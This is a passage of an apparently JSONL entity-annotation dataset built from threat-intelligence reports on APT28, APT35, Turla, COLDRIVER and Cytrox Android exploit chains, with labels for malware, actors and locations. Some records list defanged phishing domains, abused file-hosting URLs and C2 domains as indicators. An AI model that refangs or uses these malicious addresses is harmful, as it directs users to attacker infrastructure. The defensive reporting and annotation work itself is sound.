Vidar.","entities":[{"id":50930,"label":"malware","start_offset":106,"end_offset":119},{"id":50931,"label":"malware","start_offset":121,"end_offset":134},{"id":50925,"label":"malware","start_offset":53,"end_offset":71},{"id":50926,"label":"malware","start_offset":73,"end_offset":86},{"id":50927,"label":"malware","start_offset":88,"end_offset":95},{"id":50928,"label":"malware","start_offset":97,"end_offset":104},{"id":50932,"label":"malware","start_offset":136,"end_offset":141},{"id":50933,"label":"malware","start_offset":165,"end_offset":171},{"id":50934,"label":"malware","start_offset":224,"end_offset":229},{"id":50923,"label":"malware","start_offset":37,"end_offset":44},{"id":50924,"label":"malware","start_offset":46,"end_offset":51}],"relations":[{"id":1032,"from_id":50933,"to_id":50934,"type":"variant-of"}],"Comments":[]} {"id":4909,"text":"Open source malware like Sorano and AdamantiumThief were also observed.","entities":[{"id":50935,"label":"malware","start_offset":25,"end_offset":31},{"id":50936,"label":"malware","start_offset":36,"end_offset":51}],"relations":[],"Comments":[]} {"id":4910,"text":"Related hashes are listed in the Technical Details section, at the end of this report.","entities":[],"relations":[],"Comments":[]} {"id":4911,"text":"Most of the observed malware was capable of stealing both user passwords and cookies.","entities":[],"relations":[],"Comments":[]} {"id":4912,"text":"Some of the samples employed several anti-sandboxing techniques including enlarged files, encrypted archive and download IP cloaking.","entities":[],"relations":[],"Comments":[]} {"id":4913,"text":"A few were observed displaying a fake error message requiring user click-through to continue execution.","entities":[],"relations":[],"Comments":[]} {"id":4914,"text":" A large number of hijacked channels were rebranded for cryptocurrency scam live-streaming.","entities":[],"relations":[],"Comments":[]} {"id":4915,"text":"The channel name, profile picture and content were all replaced with cryptocurrency branding to impersonate large tech or cryptocurrency exchange firms.","entities":[],"relations":[],"Comments":[]} {"id":4916,"text":"The attacker live-streamed videos promising cryptocurrency giveaways in exchange for an initial contribution.","entities":[],"relations":[],"Comments":[]} {"id":4917,"text":"On account-trading markets, hijacked channels ranged from $3 USD to $4,000 USD depending on the number of subscribers.","entities":[],"relations":[],"Comments":[]} {"id":4918,"text":" These campaigns were carried out by a number of hack-for-hire actors recruited on Russian-speaking forums via the following job description, offering two types of work: This recruitment model explains the highly customized social engineering, as well as the varied malware types given each actor's choice of preferred malware.","entities":[],"relations":[],"Comments":[]} {"id":4919,"text":" We are continuously improving our detection methods and investing in new tools and features that automatically identify and stop threats like this one.","entities":[],"relations":[],"Comments":[]} {"id":4920,"text":"Some of these improvements include: It is also important that users remain aware of these types of threats and take appropriate action to further protect themselves.","entities":[],"relations":[],"Comments":[]} {"id":4921,"text":"Our recommendations: Additional resources: Avoid & Report Phishing Emails.","entities":[],"relations":[],"Comments":[]} {"id":4922,"text":"Related Malware hashes: Top Phishing Domains:","entities":[],"relations":[],"Comments":[]} {"id":4923,"text":"Google’s Threat Analysis Group tracks actors involved in disinformation campaigns, government backed hacking, and financially motivated abuse.","entities":[{"id":50937,"label":"identity","start_offset":0,"end_offset":30}],"relations":[],"Comments":[]} {"id":4924,"text":"We have a long-standing policy to send you a warning if we detect that your account is a target of government-backed phishing or malware attempts.","entities":[{"id":50938,"label":"attack-pattern","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} {"id":4925,"text":"So far in 2021, we’ve sent over 50,000 warnings, a nearly 33% increase from this time in 2020.","entities":[{"id":50939,"label":"TIME","start_offset":10,"end_offset":14},{"id":50940,"label":"TIME","start_offset":89,"end_offset":93}],"relations":[],"Comments":[]} {"id":4926,"text":"This spike is largely due to blocking an unusually large campaign from a Russian actor known as APT28 or Fancy Bear.","entities":[{"id":50942,"label":"threat-actor","start_offset":96,"end_offset":101},{"id":50943,"label":"threat-actor","start_offset":105,"end_offset":115},{"id":50941,"label":"location","start_offset":73,"end_offset":80}],"relations":[],"Comments":[]} {"id":4927,"text":"We intentionally send these warnings in batches to all users who may be at risk, rather than at the moment we detect the threat itself, so that attackers cannot track our defense strategies.","entities":[],"relations":[],"Comments":[]} {"id":4928,"text":"On any given day, TAG is tracking more than 270 targeted or government-backed attacker groups from more than 50 countries.","entities":[{"id":50944,"label":"identity","start_offset":18,"end_offset":21}],"relations":[],"Comments":[]} {"id":4929,"text":"This means that there is typically more than one threat actor behind the warnings.","entities":[],"relations":[],"Comments":[]} {"id":4930,"text":"In this blog, we explore some of the most notable campaigns we’ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.","entities":[{"id":50945,"label":"threat-actor","start_offset":131,"end_offset":136},{"id":50947,"label":"location","start_offset":141,"end_offset":148}],"relations":[{"id":1033,"from_id":50945,"to_id":50947,"type":"located-at"}],"Comments":[]} {"id":4931,"text":"This is the one of the groups we disrupted during the 2020 US election cycle for its targeting of campaign staffers.","entities":[{"id":50948,"label":"TIME","start_offset":54,"end_offset":58}],"relations":[],"Comments":[]} {"id":4932,"text":"For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government.","entities":[{"id":50949,"label":"identity","start_offset":144,"end_offset":162}],"relations":[],"Comments":[]} {"id":4933,"text":"In early 2021, APT35 compromised a website affiliated with a UK university to host a phishing kit.","entities":[{"id":50951,"label":"threat-actor","start_offset":15,"end_offset":20},{"id":50950,"label":"TIME","start_offset":3,"end_offset":13}],"relations":[],"Comments":[]} {"id":4934,"text":"Attackers sent email messages with links to this website to harvest credentials for platforms such as Gmail, Hotmail, and Yahoo.","entities":[{"id":50954,"label":"SOFTWARE","start_offset":122,"end_offset":127},{"id":50952,"label":"SOFTWARE","start_offset":102,"end_offset":107},{"id":50953,"label":"SOFTWARE","start_offset":109,"end_offset":116}],"relations":[],"Comments":[]} {"id":4935,"text":"Users were instructed to activate an invitation to a (fake) webinar by logging in.","entities":[],"relations":[],"Comments":[]} {"id":4936,"text":"The phishing kit will also ask for second-factor authentication codes sent to devices.","entities":[],"relations":[],"Comments":[]} {"id":4937,"text":"APT35 has relied on this technique since 2017 — targeting high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security.","entities":[{"id":50955,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":50956,"label":"TIME","start_offset":41,"end_offset":45}],"relations":[],"Comments":[]} {"id":4938,"text":"Credential phishing through a compromised website demonstrates these attackers will go to great lengths to appear legitimate – as they know it's difficult for users to detect this kind of attack.","entities":[{"id":50957,"label":"attack-pattern","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} {"id":4939,"text":"In May 2020, we discovered that APT35 attempted to upload spyware to the Google Play Store.","entities":[{"id":50958,"label":"TIME","start_offset":3,"end_offset":11},{"id":50959,"label":"threat-actor","start_offset":32,"end_offset":37},{"id":50960,"label":"SOFTWARE","start_offset":73,"end_offset":90}],"relations":[],"Comments":[]} {"id":4940,"text":"The app was disguised as VPN software that, if installed, could steal sensitive information such as call logs, text messages, contacts, and location data from devices.","entities":[],"relations":[],"Comments":[]} {"id":4941,"text":"Google detected the app quickly and removed it from the Play Store before any users had a chance to install it.","entities":[{"id":50961,"label":"identity","start_offset":0,"end_offset":6},{"id":50962,"label":"SOFTWARE","start_offset":56,"end_offset":66}],"relations":[],"Comments":[]} {"id":4942,"text":"Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021.","entities":[{"id":50964,"label":"identity","start_offset":78,"end_offset":81},{"id":50965,"label":"threat-actor","start_offset":91,"end_offset":96},{"id":50966,"label":"TIME","start_offset":166,"end_offset":175},{"id":50963,"label":"SOFTWARE","start_offset":9,"end_offset":19}],"relations":[],"Comments":[]} {"id":4943,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":50967,"label":"threat-actor","start_offset":43,"end_offset":48},{"id":50968,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} {"id":4944,"text":"Attackers used the Munich Security and the Think-20 (T20) Italy conferences as lures in non-malicious first contact email messages to get users to respond.","entities":[],"relations":[],"Comments":[]} {"id":4945,"text":"When they did, attackers sent them phishing links in follow-on correspondence.","entities":[{"id":50970,"label":"attack-pattern","start_offset":35,"end_offset":49}],"relations":[],"Comments":[]} {"id":4946,"text":"Targets typically had to navigate through at least one redirect before landing on a phishing domain.","entities":[],"relations":[],"Comments":[]} {"id":4947,"text":"Link shorteners and click trackers are heavily used for this purpose, and are oftentimes embedded within PDF files.","entities":[],"relations":[],"Comments":[]} {"id":4948,"text":"We’ve disrupted attacks using Google Drive, App Scripts, and Sites pages in these campaigns as APT35 tries to get around our defenses.","entities":[{"id":50972,"label":"threat-actor","start_offset":95,"end_offset":100},{"id":50971,"label":"SOFTWARE","start_offset":30,"end_offset":42}],"relations":[],"Comments":[]} {"id":4949,"text":"Services from Dropbox and Microsoft are also abused.","entities":[{"id":50974,"label":"identity","start_offset":26,"end_offset":35},{"id":50973,"label":"identity","start_offset":14,"end_offset":21}],"relations":[],"Comments":[]} {"id":4950,"text":"One of APT35’s novel techniques involves using Telegram for operator notifications.","entities":[{"id":50975,"label":"threat-actor","start_offset":7,"end_offset":12},{"id":50976,"label":"SOFTWARE","start_offset":47,"end_offset":55}],"relations":[],"Comments":[]} {"id":4951,"text":"The attackers embed javascript into phishing pages that notify them when the page has been loaded.","entities":[],"relations":[],"Comments":[]} {"id":4952,"text":"To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel.","entities":[{"id":50977,"label":"SOFTWARE","start_offset":39,"end_offset":47},{"id":50978,"label":"SOFTWARE","start_offset":98,"end_offset":106}],"relations":[],"Comments":[]} {"id":4953,"text":"The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time.","entities":[],"relations":[],"Comments":[]} {"id":4954,"text":"We reported the bot to Telegram and they have taken action to remove it.","entities":[{"id":50979,"label":"SOFTWARE","start_offset":23,"end_offset":31}],"relations":[],"Comments":[]} {"id":4955,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":50980,"label":"threat-actor","start_offset":62,"end_offset":67}],"relations":[],"Comments":[]} {"id":4956,"text":"Thousands of these warnings are sent every month, even in cases where the corresponding attack is blocked.","entities":[],"relations":[],"Comments":[]} {"id":4957,"text":"If you receive a warning it does not mean your account has been compromised, it means you have been identified as a target.","entities":[],"relations":[],"Comments":[]} {"id":4958,"text":"Workspace administrators are also notified regarding targeted accounts in their domain.","entities":[],"relations":[],"Comments":[]} {"id":4959,"text":"Users are encouraged to take these warnings seriously and consider enrolling in the Advanced Protection Program or enabling two-factor authentication if they haven't already.","entities":[],"relations":[],"Comments":[]} {"id":4960,"text":"We also block malicious domains using Google Safe Browsing – a service that Google's security team built to identify unsafe websites across the web and notify users and website owners of potential harm.","entities":[{"id":50982,"label":"identity","start_offset":76,"end_offset":98},{"id":50981,"label":"SOFTWARE","start_offset":38,"end_offset":58}],"relations":[],"Comments":[]} {"id":4961,"text":"When a user of a Safe Browsing-enabled browser or app attempts to access unsafe content on the web, they’ll see a warning page explaining that the content they’re trying to access may be harmful.","entities":[{"id":50983,"label":"SOFTWARE","start_offset":17,"end_offset":30}],"relations":[],"Comments":[]} {"id":4962,"text":"When a site identified by Safe Browsing as harmful appears in Google Search results, we show a warning next to it in the results.","entities":[{"id":50984,"label":"SOFTWARE","start_offset":62,"end_offset":75},{"id":50985,"label":"SOFTWARE","start_offset":26,"end_offset":39}],"relations":[],"Comments":[]} {"id":4963,"text":"Threat Analysis Group will continue to identify bad actors and share relevant information with others in the industry, with the goal of bringing awareness to these issues, protecting you and fighting bad actors to prevent future attacks.","entities":[{"id":50986,"label":"identity","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} {"id":4964,"text":"Indicators from APT28 phishing campaign: service-reset-password-moderate-digital.rf[.]gd reset-service-identity-mail.42web[.]io digital-email-software.great-site[.]net Indicators from APT35 campaigns: Abused Google Properties: https:\/\/sites.google[.]com\/view\/ty85yt8tg8-download-rtih4ithr\/ https:\/\/sites.google[.]com\/view\/user-id-568245\/ https:\/\/sites.google[.]com\/view\/hhbejfdwdhwuhscbsb-xscvhdvbc\/ Abused Dropbox Properties: https:\/\/www.dropbox[.]com\/s\/68y4vpfu8pc3imf\/Iraq&Jewish.pdf Phishing Domains: nco2[.]live summit-files[.]com filetransfer[.]club continuetogo[.]me accessverification[.]online customers-verification-identifier[.]site service-activity-session[.]online identifier-service-review[.]site recovery-activity-identification[.]site review-session-confirmation[.]site recovery-service-activity[.]site verify-service-activity[.]site service-manager-notifications[.]info ","entities":[{"id":50995,"label":"URL","start_offset":430,"end_offset":489},{"id":50987,"label":"threat-actor","start_offset":16,"end_offset":21},{"id":50988,"label":"DOMAIN","start_offset":42,"end_offset":88},{"id":50989,"label":"DOMAIN","start_offset":89,"end_offset":127},{"id":50990,"label":"DOMAIN","start_offset":128,"end_offset":167},{"id":50993,"label":"URL","start_offset":292,"end_offset":339},{"id":50994,"label":"URL","start_offset":340,"end_offset":401},{"id":50996,"label":"DOMAIN","start_offset":509,"end_offset":520},{"id":50997,"label":"DOMAIN","start_offset":521,"end_offset":539},{"id":51001,"label":"DOMAIN","start_offset":606,"end_offset":646},{"id":51002,"label":"DOMAIN","start_offset":647,"end_offset":680},{"id":51003,"label":"DOMAIN","start_offset":681,"end_offset":713},{"id":51004,"label":"DOMAIN","start_offset":714,"end_offset":753},{"id":51005,"label":"DOMAIN","start_offset":754,"end_offset":788},{"id":51006,"label":"DOMAIN","start_offset":789,"end_offset":821},{"id":51007,"label":"DOMAIN","start_offset":822,"end_offset":852},{"id":51008,"label":"DOMAIN","start_offset":853,"end_offset":889},{"id":50991,"label":"threat-actor","start_offset":185,"end_offset":190},{"id":50992,"label":"URL","start_offset":229,"end_offset":290},{"id":50998,"label":"DOMAIN","start_offset":540,"end_offset":559},{"id":50999,"label":"DOMAIN","start_offset":560,"end_offset":577},{"id":51000,"label":"DOMAIN","start_offset":578,"end_offset":605}],"relations":[],"Comments":[]} {"id":4965,"text":"Android App: https:\/\/www.virustotal.com\/gui\/file\/5d3ff202f20af915863eee45916412a271bae1ea3a0e20988309c16723ce4da5\/detection Android App C2: communication-shield[.]site cdsa[.]xyz","entities":[{"id":51009,"label":"DOMAIN","start_offset":141,"end_offset":168},{"id":51010,"label":"DOMAIN","start_offset":169,"end_offset":179},{"id":15245,"label":"URL","start_offset":13,"end_offset":123}],"relations":[],"Comments":[]} {"id":4966,"text":"To protect our users, Google’s Threat Analysis Group (TAG) routinely hunts for 0-day vulnerabilities exploited in-the-wild.","entities":[{"id":51011,"label":"identity","start_offset":22,"end_offset":58}],"relations":[],"Comments":[]} {"id":4967,"text":"In 2021, we reported nine 0-days affecting Chrome, Android, Apple and Microsoft, leading to patches to protect users from these attacks.","entities":[{"id":51013,"label":"SOFTWARE","start_offset":43,"end_offset":49},{"id":51016,"label":"identity","start_offset":70,"end_offset":79},{"id":51015,"label":"identity","start_offset":60,"end_offset":65},{"id":51012,"label":"TIME","start_offset":3,"end_offset":7},{"id":51014,"label":"SOFTWARE","start_offset":51,"end_offset":58}],"relations":[],"Comments":[]} {"id":4968,"text":"This blog is a follow up to our July 2021 post on four 0-day vulnerabilities we discovered in 2021, and details campaigns targeting Android users with five distinct 0-day vulnerabilities: We assess with high confidence that these exploits were packaged by a single commercial surveillance company, Cytrox, and sold to different government-backed actors who used them in at least the three campaigns discussed below.","entities":[{"id":51020,"label":"threat-actor","start_offset":298,"end_offset":304},{"id":51017,"label":"TIME","start_offset":32,"end_offset":41},{"id":51019,"label":"SOFTWARE","start_offset":132,"end_offset":139},{"id":51018,"label":"TIME","start_offset":94,"end_offset":98}],"relations":[],"Comments":[]} {"id":4969,"text":"Consistent with findings from CitizenLab, we assess likely government-backed actors purchasing these exploits are operating (at least) in Egypt, Armenia, Greece, Madagascar, Côte d’Ivoire, Serbia, Spain and Indonesia.","entities":[{"id":51025,"label":"location","start_offset":162,"end_offset":173},{"id":51026,"label":"location","start_offset":174,"end_offset":187},{"id":51027,"label":"location","start_offset":189,"end_offset":195},{"id":51029,"label":"location","start_offset":207,"end_offset":216},{"id":51021,"label":"identity","start_offset":30,"end_offset":40},{"id":51023,"label":"location","start_offset":145,"end_offset":152},{"id":51028,"label":"location","start_offset":197,"end_offset":202},{"id":51024,"label":"location","start_offset":154,"end_offset":160},{"id":51022,"label":"location","start_offset":138,"end_offset":143}],"relations":[],"Comments":[]} {"id":4970,"text":"The 0-day exploits were used alongside n-day exploits as the developers took advantage of the time difference between when some critical bugs were patched but not flagged as security issues and when these patches were fully deployed across the Android ecosystem.","entities":[{"id":51030,"label":"SOFTWARE","start_offset":244,"end_offset":251}],"relations":[],"Comments":[]} {"id":4971,"text":"Our findings underscore the extent to which commercial surveillance vendors have proliferated capabilities historically only used by governments with the technical expertise to develop and operationalize exploits.","entities":[],"relations":[],"Comments":[]} {"id":4972,"text":"Seven of the nine 0-days TAG discovered in 2021 fall into this category: developed by commercial providers and sold to and used by government-backed actors.","entities":[{"id":51031,"label":"identity","start_offset":25,"end_offset":28},{"id":51032,"label":"TIME","start_offset":43,"end_offset":47}],"relations":[],"Comments":[]} {"id":4973,"text":"TAG is actively tracking more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors.","entities":[{"id":51033,"label":"TIME","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":4974,"text":"All three campaigns delivered one-time links mimicking URL shortener services to the targeted Android users via email.","entities":[],"relations":[],"Comments":[]} {"id":4975,"text":"The campaigns were limited — in each case, we assess the number of targets was in the tens of users.","entities":[],"relations":[],"Comments":[]} {"id":4976,"text":"Once clicked, the link redirected the target to an attacker-owned domain that delivered the exploits before redirecting the browser to a legitimate website.","entities":[],"relations":[],"Comments":[]} {"id":4977,"text":"If the link was not active, the user was redirected directly to a legitimate website.","entities":[],"relations":[],"Comments":[]} {"id":4978,"text":"We've seen this technique used against journalists and other unidentified targets, and alerted those users when possible.","entities":[],"relations":[],"Comments":[]} {"id":4979,"text":"We assess that these campaigns delivered ALIEN, a simple Android malware in charge of loading PREDATOR, an Android implant described by CitizenLab in December 2021.","entities":[{"id":51036,"label":"TIME","start_offset":150,"end_offset":163},{"id":51034,"label":"malware","start_offset":94,"end_offset":102},{"id":51035,"label":"identity","start_offset":136,"end_offset":146},{"id":15307,"label":"malware","start_offset":41,"end_offset":46}],"relations":[{"id":1034,"from_id":15307,"to_id":51034,"type":"drops"}],"Comments":[]} {"id":4980,"text":"ALIEN lives inside multiple privileged processes and receives commands from PREDATOR over IPC.","entities":[{"id":51037,"label":"malware","start_offset":76,"end_offset":84},{"id":15312,"label":"malware","start_offset":0,"end_offset":5}],"relations":[],"Comments":[]} {"id":4981,"text":"These commands include recording audio, adding CA certificates, and hiding apps.","entities":[],"relations":[],"Comments":[]} {"id":4982,"text":"The first campaign, detected in August 2021, used Chrome on a Samsung Galaxy S21 and the web server immediately replied with a HTTP redirect (302) pointing to the following intent URL.","entities":[{"id":51038,"label":"TIME","start_offset":32,"end_offset":43},{"id":51039,"label":"SOFTWARE","start_offset":50,"end_offset":56}],"relations":[],"Comments":[]} {"id":4983,"text":"This URL abused a logic flaw and forced Chrome to load another URL in the Samsung Browser without user interaction or warnings.","entities":[{"id":51040,"label":"SOFTWARE","start_offset":40,"end_offset":46},{"id":51041,"label":"SOFTWARE","start_offset":74,"end_offset":89}],"relations":[],"Comments":[]} {"id":4984,"text":" We did not capture the subsequent stages, but assess the attackers did not have exploits for the current version of Chrome (91.0.4472) at that time, but instead used n-day exploits targeting Samsung Browser, which was running an older and vulnerable version of Chromium.","entities":[{"id":51042,"label":"SOFTWARE","start_offset":117,"end_offset":135},{"id":51043,"label":"SOFTWARE","start_offset":192,"end_offset":207},{"id":51044,"label":"SOFTWARE","start_offset":262,"end_offset":270}],"relations":[],"Comments":[]} {"id":4985,"text":"We assess with high confidence this vulnerability was sold by an exploit broker and probably abused by more than one surveillance vendor.","entities":[],"relations":[],"Comments":[]} {"id":4986,"text":"More technical details about this vulnerability are available in this RCA by Maddie Stone.","entities":[{"id":51045,"label":"identity","start_offset":77,"end_offset":89}],"relations":[],"Comments":[]} {"id":4987,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} {"id":4988,"text":"In September 2021, TAG detected a campaign where the exploit chain was delivered to a fully up-to-date Samsung Galaxy S10 running the latest version of Chrome.","entities":[{"id":51046,"label":"TIME","start_offset":3,"end_offset":17},{"id":51047,"label":"identity","start_offset":19,"end_offset":22},{"id":51048,"label":"SOFTWARE","start_offset":152,"end_offset":158}],"relations":[],"Comments":[]} {"id":4989,"text":"We recovered the exploit used to escape the Chrome Sandbox, but not the initial RCE exploit.","entities":[{"id":51049,"label":"SOFTWARE","start_offset":44,"end_offset":58},{"id":51050,"label":"attack-pattern","start_offset":80,"end_offset":91}],"relations":[],"Comments":[]} {"id":4990,"text":"The sandbox escape was loaded directly as an ELF binary embedding libchrome.so and a custom libmojo_bridge.so was used to ease the communication with the Mojo IPCs.","entities":[],"relations":[],"Comments":[]} {"id":4991,"text":"This means the renderer exploit did not enable MojoJS bindings like we often see in public exploits.","entities":[],"relations":[],"Comments":[]} {"id":4992,"text":"Analysis of the exploit identified two different vulnerabilities in Chrome: After escaping the sandbox, the exploit downloaded another exploit in \/data\/data\/com.android.chrome\/p.so to elevate privileges and install the implant.","entities":[{"id":51051,"label":"SOFTWARE","start_offset":68,"end_offset":74},{"id":51052,"label":"FILEPATH","start_offset":146,"end_offset":180}],"relations":[],"Comments":[]} {"id":4993,"text":"We haven’t retrieved a copy of the exploit.","entities":[],"relations":[],"Comments":[]} {"id":4994,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} {"id":4995,"text":"In October 2021, we detected a full chain exploit from an up-to-date Samsung phone running the latest version of Chrome.","entities":[{"id":51053,"label":"TIME","start_offset":3,"end_offset":15},{"id":51054,"label":"SOFTWARE","start_offset":113,"end_offset":119}],"relations":[],"Comments":[]} {"id":4996,"text":"The chain included two 0-day exploits: Of note, CVE-2021-1048 was fixed in the Linux kernel in September 2020, over a year before this campaign.","entities":[{"id":51055,"label":"vulnerability","start_offset":48,"end_offset":61},{"id":51056,"label":"TIME","start_offset":95,"end_offset":109}],"relations":[],"Comments":[]} {"id":4997,"text":"The commit was not flagged as a security issue and therefore the patch was not backported in most Android kernels.","entities":[],"relations":[],"Comments":[]} {"id":4998,"text":"At the time of the exploit, all Samsung kernels were vulnerable; LTS kernels running on Pixel phones were recent enough and included the fix for this bug.","entities":[],"relations":[],"Comments":[]} {"id":4999,"text":"Unfortunately, this is not the first time we have seen this happen with exploits in the wild; the 2019 Bad Binder vulnerability is another example.","entities":[{"id":51057,"label":"TIME","start_offset":98,"end_offset":102},{"id":51058,"label":"vulnerability","start_offset":103,"end_offset":127}],"relations":[],"Comments":[]} {"id":5000,"text":"In both cases, the fix was not flagged as a security issue and thus not backported to all (or any) Android kernels.","entities":[{"id":51059,"label":"SOFTWARE","start_offset":99,"end_offset":106}],"relations":[],"Comments":[]} {"id":5001,"text":"Attackers are actively looking for and profiting from such slowly-fixed vulnerabilities.","entities":[],"relations":[],"Comments":[]} {"id":5002,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} {"id":5003,"text":"We’d be remiss if we did not acknowledge the quick response and patching of these vulnerabilities by Google’s Chrome and Android teams.","entities":[{"id":51060,"label":"identity","start_offset":101,"end_offset":134}],"relations":[],"Comments":[]} {"id":5004,"text":"We would also like to thank Project Zero for their technical assistance in helping analyze these bugs.","entities":[],"relations":[],"Comments":[]} {"id":5005,"text":"TAG continues to track more than 30 vendors with varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors.","entities":[{"id":51061,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} {"id":5006,"text":"We remain committed to updating the community as we uncover these campaigns.","entities":[],"relations":[],"Comments":[]} {"id":5007,"text":"Tackling the harmful practices of the commercial surveillance industry will require a robust, comprehensive approach that includes cooperation among threat intelligence teams, network defenders, academic researchers and technology platforms.","entities":[],"relations":[],"Comments":[]} {"id":5008,"text":"We look forward to continuing our work in this space and advancing the safety and security of our users around the world.","entities":[],"relations":[],"Comments":[]} {"id":5009,"text":"NOTE: On May 20th, we updated our attribution to more precisely describe our findings.","entities":[{"id":51062,"label":"TIME","start_offset":9,"end_offset":17}],"relations":[],"Comments":[]} {"id":5010,"text":"Google’s Threat Analysis Group (TAG) has been closely monitoring the cybersecurity activity in Eastern Europe with regard to the war in Ukraine.","entities":[{"id":51063,"label":"identity","start_offset":0,"end_offset":36},{"id":51064,"label":"location","start_offset":95,"end_offset":109},{"id":51065,"label":"location","start_offset":136,"end_offset":143}],"relations":[],"Comments":[]} {"id":5011,"text":"Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.","entities":[{"id":51066,"label":"identity","start_offset":23,"end_offset":26},{"id":51067,"label":"attack-pattern","start_offset":106,"end_offset":122}],"relations":[],"Comments":[]} {"id":5012,"text":"Similar to other reports, we have also observed threat actors increasingly target critical infrastructure entities including oil and gas, telecommunications and manufacturing.","entities":[],"relations":[],"Comments":[]} {"id":5013,"text":"Government-backed actors from China, Iran, North Korea and Russia, as well as various unattributed groups, have used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links.","entities":[{"id":51071,"label":"location","start_offset":59,"end_offset":65},{"id":51072,"label":"location","start_offset":125,"end_offset":132},{"id":51068,"label":"location","start_offset":30,"end_offset":35},{"id":51069,"label":"location","start_offset":37,"end_offset":41},{"id":51070,"label":"location","start_offset":43,"end_offset":54}],"relations":[],"Comments":[]} {"id":5014,"text":"Financially motivated and criminal actors are also using current events as a means for targeting users.","entities":[],"relations":[],"Comments":[]} {"id":5015,"text":"As always, we continue to publish details surrounding the actions we take against coordinated influence operations in our quarterly TAG bulletin.","entities":[{"id":51073,"label":"identity","start_offset":132,"end_offset":135}],"relations":[],"Comments":[]} {"id":5016,"text":"We promptly identify and remove any such content but have not observed any significant shifts from the normal levels of activity that occur in the region.","entities":[],"relations":[],"Comments":[]} {"id":5017,"text":"Here is a deeper look at the campaign activity TAG has observed and the actions the team has taken to protect our users over the past few weeks: APT28 or Fancy Bear, a threat actor attributed to Russia GRU, was observed targeting users in Ukraine with a new variant of malware.","entities":[{"id":51078,"label":"location","start_offset":239,"end_offset":246},{"id":51074,"label":"identity","start_offset":47,"end_offset":50},{"id":51075,"label":"threat-actor","start_offset":145,"end_offset":150},{"id":51076,"label":"threat-actor","start_offset":154,"end_offset":164},{"id":51077,"label":"identity","start_offset":195,"end_offset":205}],"relations":[{"id":1035,"from_id":51076,"to_id":51075,"type":"duplicate-of"},{"id":1036,"from_id":51075,"to_id":51077,"type":"attributed-to"},{"id":1037,"from_id":51075,"to_id":51078,"type":"targets"}],"Comments":[]} {"id":5018,"text":"The malware, distributed via email attachments inside of password protected zip files (ua_report.zip), is a .Net executable that when executed steals cookies and saved passwords from Chrome, Edge and Firefox browsers.","entities":[{"id":51079,"label":"FILEPATH","start_offset":87,"end_offset":100},{"id":51082,"label":"SOFTWARE","start_offset":200,"end_offset":207},{"id":51083,"label":"SOFTWARE","start_offset":108,"end_offset":112},{"id":51080,"label":"SOFTWARE","start_offset":183,"end_offset":189},{"id":51081,"label":"SOFTWARE","start_offset":191,"end_offset":195}],"relations":[],"Comments":[]} {"id":5019,"text":"The data is then exfiltrated via email to a compromised email account.","entities":[],"relations":[],"Comments":[]} {"id":5020,"text":"Malware samples:","entities":[],"relations":[],"Comments":[]} {"id":5021,"text":"TAG would like to thank the Yahoo! Paranoids Advanced Cyber Threats Team for their collaboration in this investigation.","entities":[{"id":51084,"label":"identity","start_offset":0,"end_offset":3},{"id":51085,"label":"identity","start_offset":28,"end_offset":72}],"relations":[],"Comments":[]} {"id":5022,"text":"Turla, a group TAG attributes to Russia FSB, continues to run campaigns against the Baltics, targeting defense and cybersecurity organizations in the region.","entities":[{"id":51087,"label":"identity","start_offset":15,"end_offset":18},{"id":51086,"label":"threat-actor","start_offset":0,"end_offset":5},{"id":51088,"label":"identity","start_offset":33,"end_offset":43},{"id":51089,"label":"location","start_offset":84,"end_offset":91}],"relations":[{"id":1038,"from_id":51086,"to_id":51088,"type":"attributed-to"},{"id":1039,"from_id":51086,"to_id":51089,"type":"targets"}],"Comments":[]} {"id":5023,"text":"Similar to recently observed activity, these campaigns were sent via email and contained a unique link per target that led to a DOCX file hosted on attacker controlled infrastructure.","entities":[],"relations":[],"Comments":[]} {"id":5024,"text":"When opened, the DOCX file would attempt to download a unique PNG file from the same attacker controlled domain.","entities":[],"relations":[],"Comments":[]} {"id":5025,"text":"Recently observed Turla domains: COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to use Gmail accounts to send credential phishing emails to a variety of Google and non-Google accounts.","entities":[{"id":51091,"label":"threat-actor","start_offset":33,"end_offset":42},{"id":51092,"label":"threat-actor","start_offset":98,"end_offset":106},{"id":51093,"label":"SOFTWARE","start_offset":125,"end_offset":130},{"id":51094,"label":"identity","start_offset":191,"end_offset":197},{"id":51090,"label":"threat-actor","start_offset":18,"end_offset":23}],"relations":[{"id":1040,"from_id":51092,"to_id":51091,"type":"duplicate-of"},{"id":1041,"from_id":51091,"to_id":51093,"type":"uses"},{"id":1042,"from_id":51091,"to_id":51094,"type":"targets"}],"Comments":[]} {"id":5026,"text":"The targets include government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[],"relations":[],"Comments":[]} {"id":5027,"text":"The group's tactics, techniques and procedures (TTPs) for these campaigns have shifted slightly from including phishing links directly in the email, to also linking to PDFs and\/or DOCs hosted on Google Drive and Microsoft One 